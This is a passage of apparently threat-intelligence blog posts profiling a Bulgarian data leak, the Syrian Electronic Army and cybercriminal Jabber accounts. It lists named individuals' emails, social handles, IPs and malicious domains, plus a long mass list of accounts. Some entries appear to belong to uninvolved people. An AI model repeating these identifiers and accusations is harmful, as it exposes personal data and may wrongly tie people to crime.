quality Security and Cybercrime research? Consider making a modest $500 donation - which will better help me to

scale the project and eventually launch it.

Feel free to approach me at dancho.danchev@hush.com

Stay tuned!

1. https://form.jotformeu.com/91473099551363
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Upcoming Offensive Warfare 2.0 Cyber Security and Hacking Community YouTube Livestream Broadcast

- RSVP Today! (2019-07-02 11:17)

Dear blog readers,

I wanted to let everyone know that I’ll be doing a Live YouTube Broadcast - this Friday - 05/07/2019 20:30

P.M - Eastern European Summer Time (EEST), UTC +3 in terms of [1]my newly launched Offensive Warfare 2.0 -

Cyber Security and Hacking Community. Are you interested in attending and learning more about the project?

[2]RSVP Today and consider [3]registering to get the conversation going!

Feel free to approach me dancho.danchev@hush.com

Stay tuned!

1. https://www.offensive-warfare.com/blogs/entry/1-offensive-warfare-20-official-community-launch-announcemen

t/?ct=1562058688

2. https://offensive-warfare.app.rsvpify.com/

3. https://www.offensive-warfare.com/register
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Exposing Bulgaria’s Largest Data Leak - An OSINT Analysis (2019-07-27 10:46)

I’ve recently came across to a news article detailing the recently leaked Bulgaria NAP records database and I decided

to take a closer look. What does this leak basically constitute? Basically the attacker managed to compromise the

security of the Web Site basically leading to a successful extraction of a decent-portion of data which could basically

constitute a leak.

NOTE: The data in this analysis has been obtained using public sources.
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In this post I’ll profile a novice Bulgaria-based cybercriminal that basically managed to obtain access to the

database and shared it within several cybercrime-friendly forum communities making it publicly accessible including

an in-depth overview of TAD Group which is basically a Bulgaria-based penetration testing company.

Real Name: Daniel Ganchev - Email: daniel.ganchev@abv.bg

Sample URL of the cybercriminal involved in the campaign:

hxxp://instakilla.com/ - Email: wp@instakilla.com; info@instakilla.com

Instagram Account: hxxp://www.instagram.com/instakilla _/
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Bitcoin address used in the campaign: 3Ex6LeHorgRjkBmws4SsRZ3FXSJDXk5FhP

Sample additional domain known to have been used by the same individual: hxxp://209.250.232.143

Related URLs known to have participated in the campaign:

https://instakilla.com/5k.txt

https://instakilla.com/teaser.txt

Sample Screenshot of the Original Letter Send to Journalists:
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Let’s take a closer look at the Bulgaria-based TAD-Group is basically a well-known penetration testing company

currently running Bulgaria’s largest and most popular hacking forum community - hxxp://www.xakep.bg which was

recently blamed for Bulgaria’s largest database leak in particular its founders and several employees in the context

of performing an OSINT analysis basically highlighting some of the key functions of the company and its involvement

in the incident.

Sample Company Logo:
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Sample Hacking Forum Logo:

Sample Exploits Developed courtesy of the founder of the group:

Sample Photos of TAD Group Employees:
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Sample TAD Group Photos:
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Related personally identifiable information of TAD members:

Real Name: Ivan Todorov

Email: todorov _i@tadgroup.com; todorov _i@subway.bg

Related social network accounts:

hxxp://github.com/chapoblan

hxxp://www.facebook.com/chapoblan/

Sample Bulgaria Leaked Database URL:

hxxp://uploadfiles.io/s1p3gzh8

Sample Email known to have been used in the campaign:

Email: minfin _leak@yandex.ru

Sample MD5 known to have been used in the campaign:

MD5: 3125f2f04d3bac84c418ceb321959aba

It’s also worth pointing out that I’ve managed to come across to a fraudulent proposition courtesy of the

hxxp://www.xakep.bg cybercrime-friendly forum community with the cybercriminal behind it currently soliciting

managed hacker-for-hire type of services.

Sample screenshots courtesy of the service:
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We’ll be keeping an eye on the campaign and we’ll post updates as soon as new developments take place.
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Who’s Behind the Syrian Electronic Army? - An OSINT Analysis (2019-07-28 18:19)

Continuing the " [1]FBI Most Wanted Cybercriminals" series I’ve decided to continue providing actionable threat intelligence on some of the most prolific and wanted cybercriminals in the World through the distribution and

dissemination of actionable intelligence regarding some of the most prolific and wanted cybercriminals.

Following a series of high-profile Web site defacement and social media attack campaigns largely relying on

the utilization of good-old-fashioned social engineering attack campaigns - it appears that the individuals behind the

Syrian Electronic Army are now part of [2]FBI’s Most Wanted Cyber Watch List which means that I’ve decided to

conduct an [3]OSINT analysis further sharing actionable intelligence behind the group operators with the idea to

assist law enforcement and the U.S Intelligence Community with the necessary data which could lead to a successful

tracking down and prosecution of the team behind these campaigns.

In this post I’ll provide actionable intelligence on the group behind the Syrian Electronic Army including action-

able intelligence on the infrastructure on some of their most prolific social engineering driven campaigns.

Sample Personal Photo of Ahmad Al Agha:
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Sample Personal Photo of Firas Nur Al Din Dardar:
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Sample Web Site Defacement Screenshot courtesy of "The Shadow":
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Sample Screenshots of the Syrian Electronic Army Web Site Defacement Activity:
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Related domains known to have participated in the campaign:

hxxp://quatar-leaks.com

hxxp://net23.net

hxxp://secureids.washpost.net23.net

hxxp://mail.hrw.net84.net

hxxp://soul.websitewelcome.com

hxxp://blog.conservatives.com/wp=content/uploads/cnn.php

hxxp://ikhwansuez.net/cnn.php

hxxp://klchr-pshr.com/bo.php

hxxp://gloryshipsghana.com/wh.php

hxxp://centriplant-dev.coreware.co.uk/wp-content/blogs.dir/ob.php

hxxp://deliveryroutes.co.uk/ch.php

hxxp://sws-schulen.de/gn.php

hxxp://sws-schulen.de/ut.php

hxxp://kulalars.com/jwt.php

hxxp://karisdiscounts.com/nasa.php

Related IPs known to have participated in the campaign:

hxxp://91.144.20.76

hxxp://194.58.88.156

hxxp://88.212.209.102

hxxp://141.105.64.37

hxxp://213.178.227.152

hxxp://82.137.248.2

hxxp://82.137.200.5

hxxp://94.252.249.94

hxxp://5.149.101.187

hxxp://82.137.248.3

hxxp://76.73.101.180

hxxp://82.137.248.3
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hxxp://81.137.248.4

hxxp://82.137.248.5

hxxp://82.137.248.6

hxxp://91.144.18.219

hxxp://178.52.134.163

hxxp://78.46.142.27/ WH

hxxp://78.46.142.27/ syrian

hxxp://46.17.103.125

hxxp://46.57.135.14

hxxp://188.139.245.9

hxxp://82.137.250.235

Social Media Accounts:

hxxp://twitter.com/Official _SEA

hxxp://twitter.com/ThePro _Sy

hxxp://instagram.com/official _sea3/

hxxp://pinterest.com/officialsea/

hxxp://www.facebook.com/sea.theshadow.716

hxxp://linkedin.com/pub/th3pr0-sea

hxxp://plus.google.com/116471187595315237633

hxxp://flickr.com/photos/th3pr0

hxxp://foursquare.com/user/29524714

Skype account IDs known to have participated in the campaign:

syria.sec

koteba63

koteba

sea.shadow3

the.shadow21

tiger.white20

nana.saifo10

nana.saifo

Related emails known to have participated in the campaign:

th3pr0123-ap2@gmail.com

th3pr0123@gmail.com

whitehouse-online@hotmail.com

whitehouse _online@hotmail.com

sea.the.shadow@gmail.com

leakssyrianesorg@gmail.com

leaks.syrianes.org@gmail.com

syrian.es.sy@gmail.com

syrianessy@gmail.com

sea.wr4th@gmail.com

pr0@hotmail.nl

sy@hotmail.com

sy34@msn.com

killboy-1994@hotmail.com

jl0@hotmail.com

cf3@hotmail.com

564

zq9@msn.com

doom.ceasar@gmail.com

y8p@hotmail.com

rq1@hotmail.com

cf3@hotmail.com

wassemkortab@yahoo.com

sf0725zq0330@dressmall.com

adam.magdissi@hotmail.com

bf6@hotmail.es

b-6f@hotmail.com

bg _@hotmail.com

asdelylord@hotmail.com

i-8u@hotmail.com

b-8q@hotmail.com

tiger.tiger248@gmail.com

nagham _saifo@hotmail.com

edwinjouhansyah@gmail.com

sea.coders@hotmail.com

We’ll continue monitoring the campaign and post updates as soon as new developments take place.

1. https://ddanchev.blogspot.com/2019/01/exposing-irans-most-wanted.html

2. https://www.fbi.gov/wanted/cyber/ahmed-al-agha

3. https://www.fbi.gov/wanted/cyber/firas-dardar
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Profiling a Currently Active Portfolio of High-Profile Cybercriminal Jabber and XMPP Accounts
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In a world dominated by [1]fraudulent propositions it should be noted that Jabber and XMPP remain the primary

secure communication channel for a large portion of cybercrime-friendly propositions that I come across to on a

daily basis largely relying on [2]Off-The-Record type of functionality.

I’ve recently came across to a public list of harvested and data-mined high-profile cybercriminal’s Jabber ac-

counts and I’ve decided to share it with my blog readers for the purpose of establishing the foundations for a

successful " [3]lawful surveillance" and " [4]lawful interception" type of operational activity.
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blacklistemail@jabber.ru

blackmarketatm666@xmpp.jp

blackmoney-vip@exploit.im

blackmoney@exploit.im

blackmuffinhd@exploit.im

595

blackonwhite@jabbim.pl

blackos@novus.pk

blackout@jabber.se

blackpoodle@riseup.net

blackservers@exploit.im

blacksmok@jabber.gspnet.ru

blacksquad@exploit.im

blackstarrc@xmpp.jp

blacksystem@dukgo.com

blacktort@jabber.ru

blackwolf22@exploit.im

bladjer@prv.st

bladsw@exploit.im

blana123@jabber.ru

blast@exploit.im

blaster@sj.ms

blaster@xmpp.ru

blastex@xmpp.jp

blatnajapalka@inbox.lv

blckht1@default.rs

blckht1@xmpp.jp

bleck123@exploit.im

bleck123@zloy.im

blender@xmpp.jp

blese@jabber.cz

blessdosh@xmpp.jp

blizard@xmpp-hosting.de

block _service@xmpp.jp

blockallevil@chatme.im

blockminder@jabber.se

blokkmonsta@exploit.im

bloodk@exploit.im

bloodydoo@default.rs

blow@0nl1ne.at

blqckkk@jabber.ru

blr-2ch@default.rs

bluebook@jabber.ru

bluemist@xmpp.jp

blueshop@inme.cc

bluetooth@exploit.im

bluezebra@xmpp.ru

blx@jabber.se

blxck@nigge.rs

bm21grad@jabber.se

bm@rows.io

bmalkowski@tigase.pl

bml@exploit.im

bmo@sj.ms

bmwi82017@xmpp.jp

bn32@exploit.im
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bnw@conference.jabber.ru

bnw@jabber.ru

bob1115@jabb.im

bob909@exploit.im

bob909@xmpp.jp

bobafett@exploit.im

bobarctor@xmpp.jp

bobbi4@exploit.im

boberminer@xmpp.jp

bobinskij@exploit.im

bobjohnson@omerta.im

bobmarley@xmpp.jp

bobo1994@jabber.-hot-chilli.net

bobo1994@jabber.-hot.chilli.net

bobo1994@jabber.hot-chilli.com

bobo1994@jabber.hot-chilli.net

bobsege19@jabber.com

bobuk@jabber.ru

bocha1177@xmpp.jp

bocombo@jabber.qapp.de

bofa@jabber.de

boka@jabber.no

bollink@exploit.im

bolshevik@draugr.de

bolt785@xmpp.jp

bom6er@exploit.im

bombaster@xmpp.ru

bombom@xmpp.jp

bon-aqva@xmpp.jp

bond111@jab.gs

bond123@jabber.org

bonduk3@xmpp.jp

boni _tsk@0nl1ne.at

bonjovi@zloy.im

boolean@jabber.root.cz

boom@exploit.im

boommen@sj.ms

boomss@jabme.de

boosk@exploit.im

boosseer@jabber.ru

bootpp@exploit.im

borabora@jabber.ru

border13@jabber.org

borese@jabber.se

borgrind@kaddafi.me

boris888@exploit.im

boris88@exploit.im

boris _jus@exploit.im

borman3000@jabber.ru

born@exploit.im
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born _born@xmpp.jp

bornkill3r@jabber.org

boro@jabber.cn

boroccomr1@exploit.im

boroda@pandion.im

boroda@siph0n.pw

boroda _do _poyasa@xmpp.jp

bosanac45@exploit.im

bosource@exploit.im

boss@xmpp.jp

bossrazz@xmpp.jp

boszky@exploit.im

bot-s@exploit.im

bot@default.rs

bot@jabberbot.com

bot@jabbobot.ru

botbktest@jabber.ru

botim@exploit.im

botmaster.ru@jabber.ru

botmaster.support@jabber.cz

botnet@default.rs

botnet@dlab.im

botnet@exploit.im

botnet@wtfismyip.com

botox@exploit.im

botru@exploit.im

botshop@zloy.im

boutdat101@hot-chilli.net

boutique@wtfismyip.com

boybank@jabbim.cz

bpol@exploit.im

bputer@jabber.org

bqhost@exploit.im

br-sell@xmpp.jp

br0w@xmpp.zone

br77@exploit.im

br@exploit.im

bra1n@jabbim.cz

brain0@xmpp.jp

brainey@jabber.cz

brainpluss@jabber.org

brant@xmpp.ru

bratislavivanovic@xmpp.jp

braton@xmpp.jp

brav?@jabb3r.org

bravo@jabb3r.org

bravo@novus.pk

bravo _shbravo@novus.pk

brazilec@exploit.im

brazilianstorm@jabber.org
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breaches@securejabber.me

breaking0security@exploit.im

bredmen228@default.rs

brendy@darkdna.net

brendy@jabbim.cz

brendy@xmpp.pro

brendy@xmpp.ru

brig@jabme.de

brigade.r@exploit.im

brightbank@probiv.me

brightbank@xmpp.jp

bro22@xmpp.jp

brodark@xmpp.jp

brodga@xak.cc

brodskiy@linuxlovers.at

brom@prv.name

brome@dlab.im

bron@swissjabber.ch

bronya@jabbim.sk

bronz77777@jabber.ru

brooklyn1@n34r.us

brooklyn@jabber.to

brosafari@exploit.im

brother2.0@jabber.fr

brother@jabbim.cz

brovnc@sternenschweif.de

broy55@jabber.cz

bruere@im.rebru.ch

bruk@xmpp.ru

brunch@0nl1ne.at

bruno777@0nl1ne.at

brut@exploit.im

brute@exploit.im

brutto.dedicated@exploit.im

bruzer.m@draugr.de

bryanquan@xmpp.jp

brz _at@0nl1ne.at

bsd2688@icloud.com

bsn@exploit.im

bsns@exploit.im

bsupport@monopoly.cc

btc-exchange@jabber.ru

btc-obmen.net@exploit.im

btc@richim.org

btc _guy@jabber.calyxinstitute.org

btcbtcbtc@xmpp.jp

btcexchange777@exploit.im

btckonvertbot _m@exploit.im

btcos@jwchat.org

btcshop@exploit.im
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btq@jabster.pl

bubliki@xmmp.jp

bucho@xmpp.jp

buddah # # # # # #@exploit.im

buddah@exploit.im

buddahabuser@exploit.im

buddha@jabber.ru

buddy1312@cnw.su

budworx@tormail.org

bugatty07@xmpp.jp

bugsbunni@xmpp.jp

bugsbunny@exploit.im

bugsbunny@securejabber.me

bugsysiegel@exploit.im

bugtu70@jabber.org

buhtrap@sj.ms

bula@xmpp.jp

bulbazavr@exploit.im

bulgi@exploit.im

bulka@exploit.im

bull@jabbim.cz

bullet@exploit.im

bulletproof@exploit.im

bullets _account@jabber.org

bulletweb@xmpp.ru

bulwinkoln@xmpp.jp

bumbum@sj.ms

bundeskriminalamt@exploit.im

burakov@jamber.se

buratos@jabber.org.uk

burglary.mail@exploit.im

burnerry@xmpp.jp

burtsimpson@xmpp.jp

buryi.tina@exploit.im

busbauendespasten@jabber.cz

business2016@exploit.im

business2016@sigaint.org

business2016s@exploit.im

business724@jabber.ru

businessmaker89@jabber.de

buskets@jabme.de

busnenaraz@exploit.im

busychild@jabber.at

busyway@jabber.ru

butcher@pandion.im

buterbrod@exploit.im

butik@xmpp.jp

butrus@jabbim.cz

butt3rs@cnw.su

butt3rs@darkness.su
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buybuy@xmpp.jp

buydatabase@xmpp.jp

buyer@jabber.ru

buyerscolie@xmpp.jp

buykeys@jabber.ru

buypds@jabber.org

buyrutraff@0nl1ne.at

buytrafficusa@jabber.no

buyvbv@jabber.dk

buzer@draugr.de

buzz102@default.rs

bvance007@jabber.de

bwellborn@blah.im

bwreg@prv.name

bx-mwordering@sj.ms

bx-mwshop@securejabber.me

bx1@xmpp.org

by _matrixa@jabber.ru

by _matrixa@soft-null.ru

byaka@jabme.de

bych@jabber.cc

bych@jabber.ccc.de

bycod3e@exploit.im

bypassed@exploit.im

byshadow@exploit.im

byte.catcher@0nl1ne.at

byte.catcher@xmpp.ru

bzl@dukgo.com

c-o-n-c-e@xmpp.jp

c-service@default.rs

c.c.cash@xmpp.ru

c00lzer0@darkdna.net

c0d3r@darkjabber.cc

c0l0nel@jabber.org

c0mrade@inbox.im

c0nverse@xmpp.jp

c0rt3x@jabber.ccc.de

c123456@wtfismyip.com

c230@0nl1ne.at

c24@securejabber.me

c24@swissjabber.ch

c2bit@jabber.scha.de

c2shop@exploit.im

c348@exploit.im

c3l@c3l.lu

c3l@conference.c3l.lu

c3to@jabber.at

c4eater@jabber.org

c4rl0s@jabber.ru

c4str0@exploit.im
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c@dukgo.com

c@exploit.im

c@jabber.ru

c@lsd-25.ru

c@thesecure.biz

c@zloy.im

ca1n@cnw.su

ca1n@exploit.im

cacaca@cacaca.com

cafeteroclub@jabber.ccc.de

cairomaster@jabber.no

calen@jabber.ru

caleox@exploit.im

cali26@xmpp.jp

callab3@dukgo.com

callasgod@exploit.im

callcentr@dukgo.com

callcentr@exploit.im

calling1@jabber.no

callreserv@pandion.im

callservice@climm.org

callsupport@swissjabber.ch

calo3@bodytomail.info

calvinlau@swissjabber.ch

calypso@wwf.tl

cambox@jabber.ua

camec@exploit.im

camelblag@prv.name

camels@exploit.im

camomile@exploit.im

camomile@prv.name

campinowwh@pandion.im

campuscodi@xmpp.is

canadian@prv.st

candyplz@riseup.net

cao@jabber.ccc.de

capable@creep.im

capitrueno@jabberes.org

captain-avenger@xmpp.jp

captcha@0nl1ne.at

captcha@exploit.im

carana@exploit.im

carandash@darkjabber.cc

carandash@kinutebya.ru

carat@exploit.im

carbeerator@exploit.im

carber@sj.ms

carberp _support@jabber.se

carbonic@riseup.net

card-ok@jabber.cn
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card _life@jabb3r.net

cardashyan@jabber.ru

cardclab@dukgo.com

carder00@jabber.root.cz

carder@exploit.im

carder@mpro.la

carder@omerta.im

carder@xmpp.ru

carderjoe@jabber.org

cardermag@sj.ms

cardin@xmpp.jp

carding2wdfh6ilm@exploit.im

cardingmaestro.me@exploit.im

cardingmaestro@sj.ms

cardingmafia@creep.im

cardingsupport@exploit.im

cardingworld.pro@xmpp.jp

cardio@exploit.im

cardmafia@exploit.im

cardon@xmpp.jp

cards@nums-nums.com

cardshop@jabber.org

cardz86@cnw.su

carl@exploit.im

carlos@jabber.lqdn.fr

carlosnick@default.rs

carnagey@codingteam.net

caroquintero@jabber.ru

carou@jabber.dk

carousel@codingteam.net

carouselexchange@exploit.im

carpartsuk@jabber.se

carrier@jabber.ccc.de

carrier _reserve@exploit.im

cartel@null.pm

cartel@rows.io

cartella@protonmail.com

carter@exploit.im

carter@jabster.pl

caruosel@codingteam.net

casamonica@exploit.im

cash.dirt@darkdna.net

cash.dirt@exploit.im

cash@fuckav.in

cash@nologs.clu

cash@nologs.club

cash@xmpp.ru

cash _paypal@xmpp.jp

cashbabydoll@jabber.de

cashbabydoll@jabber.se
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cashbabydoll@jabber.sr

cashbank@exploit.im

cashbank@jabber.ru

cashcash@exploit.im

cashdaddy@xmpp.jp

cashdups@jabber.me

casherbox@xmpp.jp

cashingps@xjabber.pro

cashmarket@xmpp.jp

cashout1111@jabbim.com

cashout@monopoly.cc

cashoutmaster@zloy.im

cashoutpro@xmpp.jp

cashworld07@xmpp.zone

casky@exploit.im

casper@xmpp.cm

cassa@exploit.im

cast0@xmpp.jp

castrol@darkdna.net

castrol@jabnet.org

cat@miku.li

catalin@bleepingcomputer.com

catalogs@korovka.pro

catz@swissjabber.ch

cb1h@climm.org

cbaron@jabber.org

cbm@default.rs

cborne@dukgo.com

cborne@jappix.com

cbr600mot@jabbim.pl

cbz@jabbim.com

cc@buycc.me

cc@jabber.org.uk

cc@prv.name

cc _maybe@exploit.im

cc _shop@xmpp.jp

ccbuycheck@jabber.ru

ccdump@safetyjabber.com

ccfordominate@jabber.org

ccfrost@chatme.im

cchamp999@jwchat.org

ccleaner@jabber.se

ccliner@dukgo.com

ccpro@jabber.cz

ccs@germanyhusicaysx.onio

ccs@germanyhusicaysx.onion

ccsell@cluster.sx

ccseller@jabber.se

ccseller@swissjabber.ch

ccsellernekidala@lohov.net
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ccselleu@exploit.im

ccshop@jabber.se

ccshop@swissjabber.ch

ccv@exploit.im

ccvalid@cluster.sx

ccvalid@linum.org

ccvbvnew@linuxlovers.at

cdobro17@exploit.im

cdobro1@exploit.im

ceehech4@jabber.org

cehney@xmpp.ru

cekyshka@xmpp.jp

celine@xmpp.ru

cell@xmpp.jp

celt@xjabber.pro

celvin@jabber.de

centergrace1@xmpp.jp

centergrace@xmpp.jp

centr48@xmpp.jp

centralshop@thesecure.biz

centralshop@topsec.in

centyrion@exploit.im

ceo@0nl1ne.at

ceo@liberty24.net

ceoosaz@xmpp.jp

cepuza@zloy.im

cerberushashcracker@exploit.im

cerberushashcracker@jabber.ru

cermit@jabber.cc

cermit@jabber.ccc.de

certmaster@jabber.org

cerzy2012@xmpp.jp

cerzy2016@xjabber.pro

cesar3000@xmpp.jp

cetus@jabbim.cz

cetus@xmpp.ru

cezaro@jbber.org

cfud@exploit.im

cfudreal@exploit.im

ch3wtoy@jabber.calyxinstitute.org

cha777@jabber.dk

chack _norris@exploit.im

chadsbrat@cox.net

chainsmoke@exploit.im

chairmanpotato@exploit.im

chak@xmmp.jp

chakchak001@yandex.ru

chakchak@xmmp.jp

chakchak@xmpp.jp

chalan@jabber.sk
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champion98@xmpp.jp

change4you@exploit.im

changelog@exploit.im

chango@blah.im

channel@irc.hackint.org

chapinmaster25@jabber.org

chapinmaster@jabber.org

chaplin.with _supp@xmpp.jp

chaplin@sj.ms

chaplin@xmpp.jp

chapo@crypt.mn

chardzh@xmpp.jp

charizard@exploit.im

charlesponzi@exploit.im

charli111@exploit.im

charon@exploit.im

chat@default.rs

chbrofdil@xmpp.jp

che1486@exploit.im

cheap _vpn@0nl1ne.at

cheapflood2@exploit.im

cheapflood@0nl1ne.at

cheapguidesnow@xmpp-hosting.de

cheapstuff@worknumbers.xyz

cheapvccs@dukgo.com

cheater777@jabber.at

cheburnator@exploit.im

checkit@exploit.im

checkmybase@zloy.im

cheechnchong@sj.ms

chees@jabber.de

chefbanditdu77@xmpp.jp

chekppcvv@jabber.ru

chel.lug@conference.jabber.ru

chel1os@exploit.im

cheldrugs _opt@xmpp.jp

chelfraer0@exploit.im

cheljaba@jabbim.cz

chelkash@pandion.im

chelovek@exploit.im

chemical _alex@xmpp.ru

chemicalbrothers@sj.ms

chemicallove-blog@jabber.ru

chemikpark@xmpp.jp

chemikroznitsa@xmpp.jp

cherck@jaim.at

cherdak@xmpp.jp

cherdakk@xmpp.jp

cherdakkk@xmpp.jp

cheshir@zloy.im
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chestercom@exploit.im

chicagobt@sj.ms

chief@wtfismyip.com

chiki1@zloy.im

chillywilly85@exploit.im

chillywilly85 _reserv@xmpp.jp

chinadump@xmpp.jp

chingizxan@exploit.im

chinglee@exploit.im

chiny@exploit.im

chip@xmpp.ru

chipddos@exploit.im

chipdos@exploit.im

chippy@digitalgangster.com

chippy@otr.im

chistogrammkrsk@sj.ms

chivas@jabber.cz

chlb@xmpp.jp

chonic _u@xmpp.jp

chop77777@xmpp.ru

choroshiichelowek@exploit.im

choseppa@dukgo.com

choulinaa@jabber.cz

chpok222@jabber.se

chrisblack@jabber.org

chrisblack@jabber.se

chrisgray@default.rs

christian@nigger.li

chrome _rdp _shop@exploit.im

chrono359@exploit.im

chrysn@jabber.fsfe.org

chudak.sellall@qip.ru

chuma@default.rs

chupass@xmpp.pro

chwiya@jabb.im

cia@wtfismyip.com

cibic-sell@chatme.im

cibkrib@exploit.im

cibkrib@xmpp.jp

cifra1@xmpp.jp

ciggarinc@xjabber.pro

cihagilum@nutpa.net

ciirosavastano@jabber.dk

ciisco@exploit.im

ciphernetic@monopoly.cc

ciphernetic@w0rm.ws

cirox@cnw.su

citab@jabber.cz

citizen1000@wtfismyip.com

citizen@w0nderland.cc
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citizent@0nl1ne.at

citrushost@xjabber.org

citytronik@jabbim.com

citytronik@xmpp.jp

ciucciapalle@xmpp.jp

cjk@defunct.ch

ckjdj1@jabber.ru

ckwwwolll@xmpp.jp

clairvoyant@riseup.net

clamp@exploit.im

clamp@xmpp.ru

claris@exploit.im

clash _riot@jabber.ru

classic1@exploit.im

classic _reggie@jabber.se

claster@exploit.im

clay@haapi.mn.org

clay@jab.pm

clean@exploit.im

clementinez@jabber.sk

clerck@exploit.im

clerks@exploit.im

cleveland@exploit.im

clever@jabbim.com

cleverman@xmpp.jp

clevo@jabber.se

click@jabber.vc

clickguru@exploit.im

clipper001@xmpp.jp

clippy@hot-chilli.eu

clla-itsc@tamu.edu

clokson@exploit.im

clone22@exploit.im

clorusso@mgbuilders.com

clouds@xmpp.jp

clowbugzcar@exploit.im

clrify@expoit.im

club2crd@exploit.im

clutch5@prv.name

cm@crypt.am

cmd@exploit.im

cmd@riseup.net

cmhobbs@jabber.libernil.net

cmhobbs@member.fsf.org

cmiod@exploit.im

cmiodb@exploit.im

cn-multisig-support@crypt.am

cnensure@creep.im

cnensure@exploit.im

cnpages@xmpp.jp
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cntr _mutawahis@jabber.org.uk

cntt@0nl1ne.at

cnwhertz@jabber.de

co.upcash@hot-chilli.eu

coalitiegroningen@riseup.net

cocaine033@jabber.cz

cocksec@jabber.se

coconut@exploit.im

cocos@lcp.cc

code4j@exploit.im

codeless@jappix.com

codingteam@jabber.ru

coinex@xmpp.jp

coinphraser@jodo.im

coinseller@exploit.im

cointelpro@jabber.de

coke24@jabber.org

coled@talktalk.net

colfix@exploit.im

colinscrd@exploit.im

coloco@jappix.com

cologane@exploit.im

cologane@xmpp.jp

columbia@exploit.im

com777@sj.ms

combobreaker@jabber.calyxinstitute.org

comcon.marketdp@jabber.org

comeback@safebox.ru

comexxx@jabber.ru

comexxx@xmpp.jp

comm@lsd-25.ru

complex@null.pm

computer5@thesecure.biz

computers@cluster.sx

computizzy@jabbim.cz

comrdp@exploit.im

con@riseup.net

condomi@qip.ru

condor63@jabber.org

confedental@jabber.se

confessor@exploit.im

connect@jabber.at

connex101@jabber.org

connor@xmpp.jp

consiliarius@0nl1ne.at

consiliarius@exploit.im

contact2@pandion.im

contact@officeexploit.net

contex@jabber.no

conversation@xmpp.jp
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converse.hh@exploit.im

convertbiz@exploit.im

cooby@limun.org

coolbasa@exploit.im

cooler0000@default.rs

cooler6891@jabber.org

coolherc@xmpp.kz

coolioch@xmpp.jp

coollooks@xmpp.jp

coolman@jabber.org

coolstory@neko.im

cooltrade@jabber.org

coolws@jabber.cz

coordinationnuitdebout@riseup.net

copileft@exploit.im

copileft@xep.li

corasio@exploit.im

core64x@xmpp.jp

core@c.chilon.net

core@exploit.im

corleone@default.rs

corleone@jabber.de

corlyon@exploit.im

corpmail@darknet.im

corpstore@exploit.im

corruptions@xabber.de

cortex@exploit.im

coru-admin@xmpp.jp

coru@default.rs

coru@jabber.ru

coruws@xmpp.jp

cosmic-cs@dukgo.com

cosmo@crypt.am

cosmo@exploit.im

cosmo@viral.net

cosmopoliten@jabber.cz

costa-msk@jabber.ru

counselor@exploit.im

counselor@jabber.cz

cousinavi@exploit.im

covert@exploit.im

cow1337@jabbim.pl
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geraxy@exploit.im

gergaz@xmpp.jp

gerhard.ritter@braun.com

gerhardschroeder31@jappix.com

german-plaza@exploit.im

german11@exploit.im

germangoods@xmpp.cm

germanmalacalis@xmpp.jp

geron@exploit.im

gervald@exploit.im

getfly@xmpp.jp

getjab@zloy.im

getmoney@dukgo.com

gettokg@xmpp.jp

gevorg@jabber.cz

gf1111@swissjabber.ch

gfbbvv@cestoles.tk

gfhfgh@jjj.com

gfynthf@jabber.ru

gg@sj.ms

gh05t3d@jabb3r.org

gh0ster@securejabber.me

gh0stfromb4y@dukgo.com

ghost666@exploit.im

ghost@exploit.im
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ghostdmn@jabber.cz

ghostface@exploit.im

ghosthitler@exploit.im

ghostintown24@richim.org

ghostknight121@jabber.org





ghostpro@jabber.cz

ghostre4per@jabber.calyxinstitute.org

ghostron@xmpp.jp

ghostsoul@wtfismyip.com

ghosttesla@jabbim.cz

ghosttm@darknet.im

ghosty@exploit.im

ghtghdth4r5@xmpp.jp

giako@2d.com

gibon1991@pandion.im

gibs0n@exploit.im

giffman@crypt.am

giftcard@exploit.im

giftcard@jabber.se

giftcard@wwh.so

gigabiteshow@exploit.im

gigaxit@exploit.im

giggle _operator@xmpp.jp

gillesgilles@jabbim.cz

gilleslamiral@jabber.org

gilrin@jabber.se

gilrinhd@jabber.se

ginography@jabber.de

giorgix13@xmpp.jp

giosgios777@yax.im

giovannibar@jabbim.com

gipopotam@swissjabber.ch

giuseppe@exploit.im

giuseppe@korovka.pro

givi-giv@darkjabber.cc

gizas@jabber.ru

gizzz@xmpp.jp

gl500@pandion.im

gl@exploit.im

gladlucifer@exploit.im

gland@xmpp.jp

glass@jabme.de

glassmal@jabber.org

glav@gmx.com

glava@codingteam.net

glglglgl@jabber.at

gliitchkiing@jabber.se

glina@exploit.im

global@0nl1ne.at

globalanarch@creep.im
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globalintelligence@xmpp.ru

globape135@jabber.cz

globlux@exploit.im

glock@exploit.im

gloomer@xmpp.jp

gloopostinapas@xmpp.jp

glorikstar@default.rs

glory.class@jabber.ru

glts@swissjabber.ch

gluckonn@xmpp.jp

gluckskril@xmpp.jp

glx1@jabber.ccc.de

gm _wolf _gpg@swissjabber.ch

gmarket@0nl1ne.at

gmiller@exploit.im

gmp@jabbim.cz

gnikllort@is-a-furry.org

gnom@jabbim.com

gnomesss@xmpp.jp

gnusmas1@xmpp.jp

gnusmas@jit.si

go101@exploit.im

go777@exploit.im

go@getbackinthe.kitc

go@getbackinthe.kitchen

gocomebraza@xmpp.jp

god@draugr.de

god@system.im

godkiller@blah.im

godzilla1234@leechcraft.org

godzilla@prv.name

gogogo@exploit.im

goha@exploit.im

gohatrade@exploit.im

golandec@0nl1ne.at

gold155@exploit.im

gold _staff _21@sj.ms

goldbrokers@xmpp.jp

goldcashman@exploit.im

golden@0nl1ne.at

golden _gate@0nl1ne.at

goldenboy888@xmpp.jp

goldenchild2399@jabber.ru

goldenchild2399@jabber.rueckgr.at

goldend@xmpp.jp

goldenmarket@xmpp.jp

goldfox@exploit.im

goldlabel@exploit.im

goldo@exploit.im

goldphil333@xmpp.ru
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goldstaff@jabber.cz

golfwang@wtfismyip.com

golovazer@exploit.im

golovazer@jabber.ru

gonkong@jabbim.cz

gonsalezz@exploit.im

gonzales@codingteam.net

gonzo81@jabber.ru

gonzonvn@xmpp.jp

gonzowork@sj.ms

good.life.inc@zloy.im

good.shop@rows.io

goodlabelus@0nl1ne.at

goodlight@exploit.im

goodlogs@zloy.im

goodmanwth@exploit.im

goodshop@100500.cc

goodshop@swissjabber.ch

goodvin@jabber.se

goodwin@exploit.im

googleme.dsydgdbedsudhrfbreopnebqwdnsdyasycxuixcoo@jabber.ru

goost0jabber@xmpp.jp

goramix@exploit.im

gordin@gord.in

gorgale@riseup.net

gorihoomo@protonmail.ch

goroddorogbiz@dukgo.com

gorrrr@pandion.im

gos _001@exploit.im

goshan@jabme.de

gostznak@jabber.ru

gosu@exploit.im

gov@darkness.su

gov@openxmpp.com

gr0nx@exploit.im

grabberz@conference.xmpp.ru

grabovsky@exploit.im

grad@exploit.im

